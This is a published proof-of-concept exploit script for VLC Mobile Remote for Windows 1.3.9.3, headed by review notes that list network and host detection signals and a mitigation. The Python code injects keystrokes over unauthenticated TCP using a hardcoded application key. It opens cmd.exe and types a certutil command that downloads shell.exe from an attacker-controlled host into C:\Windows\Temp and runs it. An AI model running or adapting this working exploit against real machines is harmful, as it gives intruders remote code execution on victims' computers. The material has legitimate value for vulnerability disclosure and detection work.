# Exploit Title: VLC Mobile Remote (VMR) for Windows v1.3.9.3 RCE V2
# Date: 06/24/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://vlcmobileremote.com
# Software Link: https://vlcmobileremote.com/Releases/Setup.exe
# Version: 1.3.9.3
# Tested on: Windows 10 (Build 19044)

'''
Description:
VLC Mobile Remote for Windows 1.3.9.3 allows remote code execution via unauthenticated keystroke injection over TCP, enabling command execution and reverse shell delivery.
'''

# Review notes (defender's reading of this proof of concept):
# - Weakness, as the description states it: the VMR listener acts on
#   keyboard/system commands received over TCP without authenticating the
#   sender. Every message built below carries the same fixed
#   "appAuthenticationKey" and an empty "password".
# - NOTE(review): the key looks like an application-wide constant rather than
#   a per-install secret -- confirm against the vendor client.
# - Network signal: newline-terminated JSON objects sent to TCP 5916 whose
#   "request" field holds /requests/system/command?key=launch_url or
#   /requests/keyboard/command?key=textinput / key=enter.
# - Host signal: cmd.exe opened through a file:// URL (presumably as a child
#   of the VMR process -- confirm), then certutil.exe run with
#   "-urlcache -split -f" writing an .exe under C:\Windows\Temp, which is
#   executed straight afterwards.
# - Mitigation: the page names no fixed version. Until one is confirmed,
#   limit the listener port to trusted hosts with the host firewall, or remove
#   the application from machines that do not need it.

import json
import socket
import time
import urllib.parse

# Lab addresses and values exactly as published in the advisory.
host, port = "192.168.8.105", 5916
auth = "I2t3H*9s65J7F!E03K9M"
lhost = "192.168.8.100"
payload = "shell.exe"

# Command line typed into the console window: download via certutil, then run.
cmd = f"certutil -urlcache -split -f http://{lhost}/{payload} C:\\Windows\\Temp\\payload.exe & C:\\Windows\\Temp\\payload.exe"

# (key, value, progress label) for each request, in the order they are sent.
cmds = [
    ("launch_url", "file://C:/Windows/System32/cmd.exe", "Launch CMD"),
    ("textinput", urllib.parse.quote(cmd), "Send command"),
    ("enter", "", "Run command"),
]

with socket.socket() as sock:
    sock.connect((host, port))
    for k, v, label in cmds:
        # launch_url goes to the system endpoint; everything else is sent to
        # the keyboard endpoint. The longer pause follows the launch request.
        if k == "launch_url":
            request_path = f"/requests/system/command?key={k}&value={v}"
            pause_seconds = 3
        else:
            request_path = f"/requests/keyboard/command?key={k}&value={v}"
            pause_seconds = 1

        # Wire format: one JSON object per line, timestamp in milliseconds.
        message = {
            "appAuthenticationKey": auth,
            "password": "",
            "sentTime": str(int(time.time() * 1000)),
            "request": request_path,
        }
        wire_bytes = (json.dumps(message) + "\x0a").encode()
        sock.sendall(wire_bytes)
        print(f"[>] {label}")
        time.sleep(pause_seconds)

print("[✓] Done.")